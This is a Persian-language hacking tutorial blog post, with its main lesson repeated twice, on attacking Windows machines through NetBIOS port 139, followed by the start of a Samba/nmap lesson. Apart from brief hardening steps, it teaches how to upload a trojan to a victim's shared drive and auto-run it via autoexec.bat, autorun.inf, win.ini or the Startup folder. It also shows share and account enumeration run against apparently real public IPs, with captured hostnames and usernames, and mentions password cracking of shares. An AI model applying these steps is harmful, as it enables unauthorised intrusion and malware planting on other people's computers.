- خلاصه درس: در این درس نکات دیگری راجع به پورت ۱۳۹ میآموزیم.
◊ چگونه NetBIOS را روی کامپیوتر خودمان فعال یا غیر فعال کنیم؟
برای غیرفعال کردن NetBIOS در ویندوز با توجه به نوع آن ویندوز روشهای مختلفی هست. جدول پایینی برای همین موضوع طراحی شده است:
Win 2000
Win XP Home
Win XP Professional
Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok
Start > Programs > Administrative Tools > Local Security Settings > Local Policies >
1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled
2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled
Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2
میتونید به کمک فایروال یا روتر پورتهای زیر را ببندید:
135 TCP DCE/RPC Portmapper
137 TCP/UDP NetBIOS Name Service
138 TCP/UDP NetBIOS Datagram Service
139 TCP NetBIOS Session Service
445 TCP Microsoft-DS (Windows 2000 CIFS/SMB)
۱- وقتی پورت ۱۳۹ رو میبندید، دیگه نمیتونید از NetBIOS استفاده کنید ( مگر اینکه دوباره پورت رو به صورت فعال در آورید). پس وقتی که کسی رو میخواهید هک کنید، نیاز دارید که برای مدت کوتاهی دوباره پورت رو فعال کنید.
۲- میبینید که مثلا برای ویندوز ۲۰۰۰ به سه روش کار کنید، در این جدول فقط کافی است یکی رو اعمال کنید.
۳- اگه بعد از غیر فعال کردن، دوباره بخواهید فعال کنید، در مرحله آخر هر یک از روشهای بالا، گزینهای که مخالف گزینه ذکر شده در جدول است رو انتخاب کنید، مثلا اگه در جدول Enabled را نوشتهایم، شما Disable را انتخاب کنید.
◊ چگونه از این امکانات به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم؟
خوب ما هنوز طریقه استفاده از تروجان رو یاد نگرفتیم ولی سعی میکنم تو یکی از درسهای آینده اونو توضیح بدم. ما اینجا میخواهیم از تروجان در رابطه با پورت ۱۳۹ استفاده کنیم. حالا سوال این است که تروجان (trojan) چیست؟
تروجان بهطور ساده برنامهای اجرایی است، که ما برای طرف مقابل میفرستیم و اگه طرف مقابل اونو اجرا کنه، ما میتونیم کنترل سیستم اونو به دست بیاریم. تا اینجا کافی است فعلا ولی بعدا بیشتر توضیح میدم.
حالا همان بحث تروجان ولی در رابطه با پورت ۱۳۹ :
روش کار به این صورت است که فرضا من الان تونستم یک درایو رو از یک کامپیوتر با پورت باز Share کنم. حالا فایل تروجان ( سرور تروجان ) را upload میکنم به اون کامپیوتر و اسمی براش انتخاب میکنم که طرف مقابل رو به اجرای فایل تشویق کنه. یک اشتباهی که بعضیها میکنند اینه که بعد از کپی کردن تروجان در کامپیوتر هدف، خود هکر میآد و فایل رو دابل کلیک میکنه، در این حالت تروجان روی کامپیوتر خودمون (هکر) اجرا میشه نه کامپیوتر قربانی. پس ما فقط فایل رو میفرستیم و منتظر میمونیم که طرف مقابل اجرا کنه.
حالا چند روش رو مطرح میکنم که در شرایط خاص حالتی رو ایجاد میکنه که نیازی با دابلکلیک توسط قربانی نباشد:
۱- اگه به درایو C کامپیوتر مقابل دسترسی دارید، یک سطر به فایل autoexec.bat اضافه کنید که نام و مسیر فایل اجرایی را در اون سطر بنویسید. مثلا اگه اسم تروجان ali.exe باشد و در مسیر d:\newfolder باشد، سطری که اضافه میکنیم به صورت زیر است:
d:\newfolder\ali.exe
در این حالت به محض اولین restart کامپیوتر، تروجان اجرا خواهد شد.
۲- اگه به درایو C دسترسی دارید، میتونید فایلی به اسم Autorun.inf ایجاد کنید و دستورات زیر را بنویسید ( سطر آخر مطابق با همان تروجان فرضی که در مثال قبل گفتیم، نوشته شده است، اونو با توجه به اسم تروجان و مسیر اون تغییر دهید) :
[autorun]
open=d:\newfolder\ali.exe
۳- اگه به فولدر ویندوز دسترسی دارید، میتونید یک سطر مثل همان مثال قبل ولی برای فایل winstart.bat اجرا کنید. در این حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ویندوز دسترسی دارید، در فایل win.ini و بعد از قسمتی که [windows] نوشته، این سطر رو اضافه کنید:
run=d:\newfolder\ali.exe
۵- اگه به فولدر ویندوز دسترسی دارید، میتونید تروجان رو به فولدر Start Menu\Startup اضافه کنید. در این حالت نیازی به ویرایش هیچ فایل دیگری نیست.
◊ ابزارهای کمکی: ۱- ابزارهای خط فرمانی
۱- enum :
این برنامه را از اینجا داونلود کنید. enum نرمافزاری با قابلیتهای فوقالعاده است. از جمله تواناییهایی که دارد، در مواردی است که کامپیوتر طرف مقابل برای اعمال sharing از ما پسورد بخواد. در این موارد میتونیم به کمک enum و لیستی از پسوردهایی که در یک فایل ذخیره شده، تعداد زیادی پسورد رو چک کنیم ( اصطلاحا cracking ) و شاید به نتیجه برسیم. ( این موضوع را بعدا بیشتر توضیح مبدم) کاربردی که الان مد نظر ماست، پیدا کردن لیست share هایی است که کامپیوتر مقابل برای ما باز گذاشته است. مثلا من دستور زیر را تایپ کردم، تا لیست اشتراکهای آن ip خاص در آن لحظه رو بدست بیارم:
enum -S 217.218.84.29
و جواب شنیدم:
server: 217.218.84.29
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer
cleaning up... success.
ملاحظه میفرمایید که درایوهای E و D و F و C و نیز SharedDocs و ... لیست شده است. بقیه مراحل مثل درس ۲۱ است. (دقت کنید که در این حالت نیازی به null session نیست ).
۲- nbtscan :
این برنامه را از اینجا داونلود کنید. این برنامه دقیقا معادل nbtstat است ولی با این تفاوت که میتونه تعداد زیادی ip رو همزمان تست کنه و لیست share ها رو بدست بیاره. این دقیقا راهحلی است برای سوالی که خیلی از شما دوستان پرسیده بودین. مثلا اگه بنویسم:
nbtscan -v -s : 195.219.49.0-30
که لیست اشتراکها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست میاره. جواب میشنوم:
195.219.49.1 Recvfrom failed: Connection reset by peer
195.219.49.5 Recvfrom failed: Connection reset by peer
195.219.49.6 Recvfrom failed: Connection reset by peer
195.219.49.7 Recvfrom failed: Connection reset by peer
195.219.49.8 Recvfrom failed: Connection reset by peer
195.219.49.12 Recvfrom failed: Connection reset by peer
195.219.49.23:MRS.ZADE :00U
195.219.49.23:ATINET_MRA :00G
195.219.49.23:MRS.ZADE :03U
195.219.49.23:MAC:44-45-53-54-00-00
195.219.49.28:MAC:44-45-53-54-00-00
195.219.49.26:KIYARASH-R96L0K:00U
195.219.49.26:KIYARASH-R96L0K:20U
195.219.49.26:WORKGROUP :00G
195.219.49.26:WORKGROUP :1eG
195.219.49.26:MAC:00-53-45-00-00-00
195.219.49.22:FARHANG-ZCT780D:00U
195.219.49.22:FARHANG-ZCT780D:20U
195.219.49.22:WORKGROUP :00G
195.219.49.22:WORKGROUP :1eG
195.219.49.22:MAC:00-53-45-00-00-00
195.219.49.29:TESSA :00U
195.219.49.29:WORKGROUP :00G
195.219.49.29:TESSA :03U
195.219.49.29:MAC:44-45-53-54-00-00
195.219.49.25:MAC:44-45-53-54-00-00
در مورد ip هایی که 20U را میبینید، یعنی sharing رو میشه استفاده کرد.
۳- winfo :
اینم از جمله برنامههایی است که باید بگم آخر برنامه است!! از اینجا داونلود کنید. البته توانایی تست تعداد زیادی ip رو نداره ولی وقتی یه ip رو تست میکنه همهچی شو در رو میکنه. (البته میشه گفت همه این کارها رو میشه با enum هم انجام داد ). مثلا من دستور زیر را تایپ کردم :
winfo 195.219.49.184 -n -v
و به نتایج زیر رسیدم:
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
Trying to establish null session...
Null session established.
SYSTEM INFORMATION:
- OS version: 4.0
DOMAIN INFORMATION:
- Primary domain (legacy): DSG
- Account domain: TEHRAN
Warning: Unable to retrieve domain DNS information.
Reason : Not supported by the remote OS.
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: ARTAWILL-V0P1QR
- User:
LOGGED IN USERS:
* Administrator
USER ACCOUNTS:
* Administrator
- Password age: 666 days
- Privilege level: Administrator
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for administering the computer/domain
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: Mon Mar 03 23:10:23 2003
- Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in administrator account)
* Guest
- Password age: 680 days
- Privilege level: Guest
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for guest access to the computer/domain
- Account is: Disabled
- User can change password: No
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in guest account)
* TEST
- Password age: 680 days
- Privilege level: User
- Home directory:
- Home directory mapped as:
- Comment:
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: No
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: Yes
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* IPC$
- Type: Unknown
- Remark: Remote IPC
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
بعدا سعی خواهم کرد که در مورد تک تک اینها بحث کنم براتون. ولی به عنوان مثال در آخرها میتونین، share ها رو ببینید.
۴- NAT :
این برنامه را از اینجا داونلود کنید. یکی از مهمترین کاربردهای اون crack کردن پسورد sharing است ( مثل enum ). برای کار با NAT کافی است، بنویسید nat و بعد یک فاصله و بعد ip را مینویسیم. حتما تست کنید و نتیجه رو ببینید... ( تکلیف برای خودتون )
۵- و ...
◊ ابزارهای کمکی: ۲- ابزارهای گرافیکی
۱- netbrute :
این برنامه را از اینجا داونلود کنید. من از بین ابزارهای گرافیکی اینو توصیه میکنم اگرچه به اندازه دو نرمافزار بعدی مشهور نیست. من نمیخوام روش کار با اینو توضیح بدم چون خیلی تابلو ه! ضمنا این نرمافزار داخل خودش یک پورت اسکنر هم داره که خیلی به درد میخوره. حتما حتما حتما داونلود کنید اینو و اونقدر انگولکش کنید که سر در بیارین ازش. قرار نیست که همیچی رو من بهتون بگم !!
۲- Legion :
اگه بگم مشهورترین نرمافزار اسکن کردن پورت ۱۳۹ این نرمافزاره، سخن گزافی نیست!! خیلیها کشته مرده اون هستن ولی من زیاد ازش خوشم نمیآد. اما باید قبول کرد که کارش واقعا عالیه!!! به هر حال اگه خواستین داوللود کنید، اینجا رو کلیک کنید.
۳- DumpSec یا DumpACL :
این هم خیلی معروفه. اگه خواستین میتونین از اینجا داونلود کنید.
◊ آیا چیز دیگهای راجع به این پورت مونده که بحث نشده باشد؟
بله!
۱- یه نرمافزاری هست به اسم pqwak که اینطوری که میگن، اگه کامپیوتر مقابل ویندوز ۹۸ باشه، میتونه پسورد اونو سه سوت در بیاره. ( این برنامه از نقطه ضعف ویندوز ۹۸ راجع به netbios استفاده میکنه و اونو exploit میکنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاینت، پس نباید زیاد به درد ما بخوره ( توجه کنید که ویندوز ۹۸ تو کار کلاینتاش هم مونده، چه برسه به اینکه سرور باشه! ). خودتون بگردین و اونو اگه میخواین پیدا کنید.
۲- ما بحث استفاده از نقاط ضعف پورتها رو هنوز شروع نکردهایم و در مورد پورت ۱۳۹ هم همینطوره. به عنوان مثال روشهایی هست که پورت ۱۳۹ رو exploit کنیم و اون مراحلی که توش گیر میکردیم رو دور بزنیم.
۳- نکته آخر راجع به این پورت اینه که مواظب خودتون باشین. حتما ورزش کنین. سیگار نکشین چون برای سلامتی خیلی بده! ( قابل توجه بعضیها) حرف بابا مامانتون رو گوش کنین. اگه کنکور دارین با اینکه دارین مشروط میشین، بهجای هک کردن برین درس بخونین! همینها... باقی بقایت، جانم فدایت ...
◊ چگونه NetBIOS را روی کامپیوتر خودمان فعال یا غیر فعال کنیم؟
برای غیرفعال کردن NetBIOS در ویندوز با توجه به نوع آن ویندوز روشهای مختلفی هست. جدول پایینی برای همین موضوع طراحی شده است:
Win 2000
Win XP Home
Win XP Professional
Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok
Start > Programs > Administrative Tools > Local Security Settings > Local Policies >
1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled
2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled
Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2
میتونید به کمک فایروال یا روتر پورتهای زیر را ببندید:
135 TCP DCE/RPC Portmapper
137 TCP/UDP NetBIOS Name Service
138 TCP/UDP NetBIOS Datagram Service
139 TCP NetBIOS Session Service
445 TCP Microsoft-DS (Windows 2000 CIFS/SMB)
۱- وقتی پورت ۱۳۹ رو میبندید، دیگه نمیتونید از NetBIOS استفاده کنید ( مگر اینکه دوباره پورت رو به صورت فعال در آورید). پس وقتی که کسی رو میخواهید هک کنید، نیاز دارید که برای مدت کوتاهی دوباره پورت رو فعال کنید.
۲- میبینید که مثلا برای ویندوز ۲۰۰۰ به سه روش کار کنید، در این جدول فقط کافی است یکی رو اعمال کنید.
۳- اگه بعد از غیر فعال کردن، دوباره بخواهید فعال کنید، در مرحله آخر هر یک از روشهای بالا، گزینهای که مخالف گزینه ذکر شده در جدول است رو انتخاب کنید، مثلا اگه در جدول Enabled را نوشتهایم، شما Disable را انتخاب کنید.
◊ چگونه از این امکانات به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم؟
خوب ما هنوز طریقه استفاده از تروجان رو یاد نگرفتیم ولی سعی میکنم تو یکی از درسهای آینده اونو توضیح بدم. ما اینجا میخواهیم از تروجان در رابطه با پورت ۱۳۹ استفاده کنیم. حالا سوال این است که تروجان (trojan) چیست؟
تروجان بهطور ساده برنامهای اجرایی است، که ما برای طرف مقابل میفرستیم و اگه طرف مقابل اونو اجرا کنه، ما میتونیم کنترل سیستم اونو به دست بیاریم. تا اینجا کافی است فعلا ولی بعدا بیشتر توضیح میدم.
حالا همان بحث تروجان ولی در رابطه با پورت ۱۳۹ :
روش کار به این صورت است که فرضا من الان تونستم یک درایو رو از یک کامپیوتر با پورت باز Share کنم. حالا فایل تروجان ( سرور تروجان ) را upload میکنم به اون کامپیوتر و اسمی براش انتخاب میکنم که طرف مقابل رو به اجرای فایل تشویق کنه. یک اشتباهی که بعضیها میکنند اینه که بعد از کپی کردن تروجان در کامپیوتر هدف، خود هکر میآد و فایل رو دابل کلیک میکنه، در این حالت تروجان روی کامپیوتر خودمون (هکر) اجرا میشه نه کامپیوتر قربانی. پس ما فقط فایل رو میفرستیم و منتظر میمونیم که طرف مقابل اجرا کنه.
حالا چند روش رو مطرح میکنم که در شرایط خاص حالتی رو ایجاد میکنه که نیازی با دابلکلیک توسط قربانی نباشد:
۱- اگه به درایو C کامپیوتر مقابل دسترسی دارید، یک سطر به فایل autoexec.bat اضافه کنید که نام و مسیر فایل اجرایی را در اون سطر بنویسید. مثلا اگه اسم تروجان ali.exe باشد و در مسیر d:\newfolder باشد، سطری که اضافه میکنیم به صورت زیر است:
d:\newfolder\ali.exe
در این حالت به محض اولین restart کامپیوتر، تروجان اجرا خواهد شد.
۲- اگه به درایو C دسترسی دارید، میتونید فایلی به اسم Autorun.inf ایجاد کنید و دستورات زیر را بنویسید ( سطر آخر مطابق با همان تروجان فرضی که در مثال قبل گفتیم، نوشته شده است، اونو با توجه به اسم تروجان و مسیر اون تغییر دهید) :
[autorun]
open=d:\newfolder\ali.exe
۳- اگه به فولدر ویندوز دسترسی دارید، میتونید یک سطر مثل همان مثال قبل ولی برای فایل winstart.bat اجرا کنید. در این حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ویندوز دسترسی دارید، در فایل win.ini و بعد از قسمتی که [windows] نوشته، این سطر رو اضافه کنید:
run=d:\newfolder\ali.exe
۵- اگه به فولدر ویندوز دسترسی دارید، میتونید تروجان رو به فولدر Start Menu\Startup اضافه کنید. در این حالت نیازی به ویرایش هیچ فایل دیگری نیست.
◊ ابزارهای کمکی: ۱- ابزارهای خط فرمانی
۱- enum :
این برنامه را از اینجا داونلود کنید. enum نرمافزاری با قابلیتهای فوقالعاده است. از جمله تواناییهایی که دارد، در مواردی است که کامپیوتر طرف مقابل برای اعمال sharing از ما پسورد بخواد. در این موارد میتونیم به کمک enum و لیستی از پسوردهایی که در یک فایل ذخیره شده، تعداد زیادی پسورد رو چک کنیم ( اصطلاحا cracking ) و شاید به نتیجه برسیم. ( این موضوع را بعدا بیشتر توضیح مبدم) کاربردی که الان مد نظر ماست، پیدا کردن لیست share هایی است که کامپیوتر مقابل برای ما باز گذاشته است. مثلا من دستور زیر را تایپ کردم، تا لیست اشتراکهای آن ip خاص در آن لحظه رو بدست بیارم:
enum -S 217.218.84.29
و جواب شنیدم:
server: 217.218.84.29
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer
cleaning up... success.
ملاحظه میفرمایید که درایوهای E و D و F و C و نیز SharedDocs و ... لیست شده است. بقیه مراحل مثل درس ۲۱ است. (دقت کنید که در این حالت نیازی به null session نیست ).
۲- nbtscan :
این برنامه را از اینجا داونلود کنید. این برنامه دقیقا معادل nbtstat است ولی با این تفاوت که میتونه تعداد زیادی ip رو همزمان تست کنه و لیست share ها رو بدست بیاره. این دقیقا راهحلی است برای سوالی که خیلی از شما دوستان پرسیده بودین. مثلا اگه بنویسم:
nbtscan -v -s : 195.219.49.0-30
که لیست اشتراکها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست میاره. جواب میشنوم:
195.219.49.1 Recvfrom failed: Connection reset by peer
195.219.49.5 Recvfrom failed: Connection reset by peer
195.219.49.6 Recvfrom failed: Connection reset by peer
195.219.49.7 Recvfrom failed: Connection reset by peer
195.219.49.8 Recvfrom failed: Connection reset by peer
195.219.49.12 Recvfrom failed: Connection reset by peer
195.219.49.23:MRS.ZADE :00U
195.219.49.23:ATINET_MRA :00G
195.219.49.23:MRS.ZADE :03U
195.219.49.23:MAC:44-45-53-54-00-00
195.219.49.28:MAC:44-45-53-54-00-00
195.219.49.26:KIYARASH-R96L0K:00U
195.219.49.26:KIYARASH-R96L0K:20U
195.219.49.26:WORKGROUP :00G
195.219.49.26:WORKGROUP :1eG
195.219.49.26:MAC:00-53-45-00-00-00
195.219.49.22:FARHANG-ZCT780D:00U
195.219.49.22:FARHANG-ZCT780D:20U
195.219.49.22:WORKGROUP :00G
195.219.49.22:WORKGROUP :1eG
195.219.49.22:MAC:00-53-45-00-00-00
195.219.49.29:TESSA :00U
195.219.49.29:WORKGROUP :00G
195.219.49.29:TESSA :03U
195.219.49.29:MAC:44-45-53-54-00-00
195.219.49.25:MAC:44-45-53-54-00-00
در مورد ip هایی که 20U را میبینید، یعنی sharing رو میشه استفاده کرد.
۳- winfo :
اینم از جمله برنامههایی است که باید بگم آخر برنامه است!! از اینجا داونلود کنید. البته توانایی تست تعداد زیادی ip رو نداره ولی وقتی یه ip رو تست میکنه همهچی شو در رو میکنه. (البته میشه گفت همه این کارها رو میشه با enum هم انجام داد ). مثلا من دستور زیر را تایپ کردم :
winfo 195.219.49.184 -n -v
و به نتایج زیر رسیدم:
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
Trying to establish null session...
Null session established.
SYSTEM INFORMATION:
- OS version: 4.0
DOMAIN INFORMATION:
- Primary domain (legacy): DSG
- Account domain: TEHRAN
Warning: Unable to retrieve domain DNS information.
Reason : Not supported by the remote OS.
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: ARTAWILL-V0P1QR
- User:
LOGGED IN USERS:
* Administrator
USER ACCOUNTS:
* Administrator
- Password age: 666 days
- Privilege level: Administrator
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for administering the computer/domain
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: Mon Mar 03 23:10:23 2003
- Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in administrator account)
* Guest
- Password age: 680 days
- Privilege level: Guest
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for guest access to the computer/domain
- Account is: Disabled
- User can change password: No
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in guest account)
* TEST
- Password age: 680 days
- Privilege level: User
- Home directory:
- Home directory mapped as:
- Comment:
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: No
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: Yes
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* IPC$
- Type: Unknown
- Remark: Remote IPC
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
بعدا سعی خواهم کرد که در مورد تک تک اینها بحث کنم براتون. ولی به عنوان مثال در آخرها میتونین، share ها رو ببینید.
۴- NAT :
این برنامه را از اینجا داونلود کنید. یکی از مهمترین کاربردهای اون crack کردن پسورد sharing است ( مثل enum ). برای کار با NAT کافی است، بنویسید nat و بعد یک فاصله و بعد ip را مینویسیم. حتما تست کنید و نتیجه رو ببینید... ( تکلیف برای خودتون )
۵- و ...
◊ ابزارهای کمکی: ۲- ابزارهای گرافیکی
۱- netbrute :
این برنامه را از اینجا داونلود کنید. من از بین ابزارهای گرافیکی اینو توصیه میکنم اگرچه به اندازه دو نرمافزار بعدی مشهور نیست. من نمیخوام روش کار با اینو توضیح بدم چون خیلی تابلو ه! ضمنا این نرمافزار داخل خودش یک پورت اسکنر هم داره که خیلی به درد میخوره. حتما حتما حتما داونلود کنید اینو و اونقدر انگولکش کنید که سر در بیارین ازش. قرار نیست که همیچی رو من بهتون بگم !!
۲- Legion :
اگه بگم مشهورترین نرمافزار اسکن کردن پورت ۱۳۹ این نرمافزاره، سخن گزافی نیست!! خیلیها کشته مرده اون هستن ولی من زیاد ازش خوشم نمیآد. اما باید قبول کرد که کارش واقعا عالیه!!! به هر حال اگه خواستین داوللود کنید، اینجا رو کلیک کنید.
۳- DumpSec یا DumpACL :
این هم خیلی معروفه. اگه خواستین میتونین از اینجا داونلود کنید.
◊ آیا چیز دیگهای راجع به این پورت مونده که بحث نشده باشد؟
بله!
۱- یه نرمافزاری هست به اسم pqwak که اینطوری که میگن، اگه کامپیوتر مقابل ویندوز ۹۸ باشه، میتونه پسورد اونو سه سوت در بیاره. ( این برنامه از نقطه ضعف ویندوز ۹۸ راجع به netbios استفاده میکنه و اونو exploit میکنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاینت، پس نباید زیاد به درد ما بخوره ( توجه کنید که ویندوز ۹۸ تو کار کلاینتاش هم مونده، چه برسه به اینکه سرور باشه! ). خودتون بگردین و اونو اگه میخواین پیدا کنید.
۲- ما بحث استفاده از نقاط ضعف پورتها رو هنوز شروع نکردهایم و در مورد پورت ۱۳۹ هم همینطوره. به عنوان مثال روشهایی هست که پورت ۱۳۹ رو exploit کنیم و اون مراحلی که توش گیر میکردیم رو دور بزنیم.
۳- نکته آخر راجع به این پورت اینه که مواظب خودتون باشین. حتما ورزش کنین. سیگار نکشین چون برای سلامتی خیلی بده! ( قابل توجه بعضیها) حرف بابا مامانتون رو گوش کنین. اگه کنکور دارین با اینکه دارین مشروط میشین، بهجای هک کردن برین درس بخونین! همینها... باقی بقایت، جانم فدایت ...
کوچیک ::: سه شنبه 86/7/24::: ساعت 3:0 صبح
نظرات دیگران: نظر
- خلاصه درس: با NetBIOS آشنا شدهایم. همانطور که میدانید برای اینکه از دستورات درس قبل استفاده کنیم، شرطی که داشتیم این بود که علاوه بر کامپیوتر مقابل، کامپیوتر شما هم باید از نسخههای ویندوز بوده و نیز NetBIOS در آن فعال باشد. حالا اگه سیستمعاملی که خودتون -هکر- استفاده میکنید، لینوکس باشد، آیا باز هم میشود کاری کرد؟ - آرمین رنجبر در این درس همین سوال رو پاسخ میدهد.
◊ Samba چیست؟
احتمالا میدونید که Netbios پرتکل معروف مایکروسافت برای ارتباط ویندوز ها با هم و احتمالا Share کردن پرینتر یا فایله. همچنین وقتی که بحث نفوذ به Client و بر بعضی مواقع Server ها پیش میاد، Netbios یکی از اولین انتخاب هاست. ما در این مقاله سعی میکنیم از این ضعف سیستم عاملهای مایکروسافت سوءاستفاده کنیم.
سیستم عاملهای بر پاییه یونیکس مثل لینوکس برای Share کردن فایلها و پرینتر ها از طریق Netbios از پرتکل Smb/Cifs که توسط برنامه Samba باز میشه استفاده میکنن و از این طریق لینوکس میتونه Share های کامپیوتر های ویندوز رو Mount کنه. (اگه کاربر لینوکس هستید، نمیتونید روشهایی که در درس قبلی برای ویندوز ذکر شده استفاده کنید، بلکه باید از Samba بهره گیرید. اما طرف مقابل که قرار است هک بشه، سیستمعاملش رو فرض میکنیم که ویندوزه. پس ما میخوایم با لینوکس یک سیستمعامل ویندوز را که ۱۳۹ باز داره، هک کنیم) بی شک Netbios عمومی ترین مشکل امنیتی ویندوزه که استفاده ازش چندان مشکل نیست.
خب ! همون طور که گفتم ما برای این کار از Samba استفاده میکنیم. من اینجا چیزی در مورد Samba نمینویسم و بنا کار رو بر این میگذارم که تا حدودی میتونید با Samba کار کنید . اگر احتمالا مشکلی دارید میتونید به Samba.org سر بزنید و در Documention ها دنبال راهنما باشید :) به طور کل اگر نمیدونید چطور از Samba استفاده کنید بهتره که کاری با کامپیوتر های مردم نداشته باشید ! :)
◊ چگونه با پورت ۱۳۹ صحبت کنیم؟
۱- اولین قدم پیدا کردن کامپیوتریه که پرت 139 و 137 که پرت Netbios هست رو باز کرده باشه. برای اینکار از Nmap استفاده میکنیم. Nmap معمولا رو همه Description های فعلی پیدا میشه. میخوام به کمک Nmap تست کنم که از ip شماره 192.168.3.50 تا 192.168.3.1 کدامها پورت ۱۳۹ باز دارند. برای این کار مینویسم:
# nmap -sS -O 192.168.3.1-50 -p 139
و جواب میشنوم:
st 1 open and 1 closed TCP port
Interesting ports on (192.168.3.2):
Port State Service
139/tcp open netbios-ssn
Remote OS guesses: Windows Millennium Edition (Me), Win 2000,
or WinXP, MS Windows2000 Professional RC1/W2K Advance Server Beta3
باید اینو بهتون بگم که من دارم این کار رو روی Lan انجام میدم و همه Ip ها Static هستند. ولی خب کار رو جوری در نظر میگیرم که گویا نمیدونم چه Host های اینجا وجود دارن :) 192.168.3.1 یک SuSE 8 هست که کار رو از طریقش انجام میدیم و 192.168.3.2 یک win2kpro sp2 هست که قربانیه و البته FireWall نداره :) من اینجا از آیپی های کلاس C استفاده میکنم ممکنه وضع شما تو اینترنت فرق کنه، ولی خب نحوه کار تغییر نمیکنه. حالا هدف رو پیدا کردیم، هدف ما 192.168.3.2 هست .
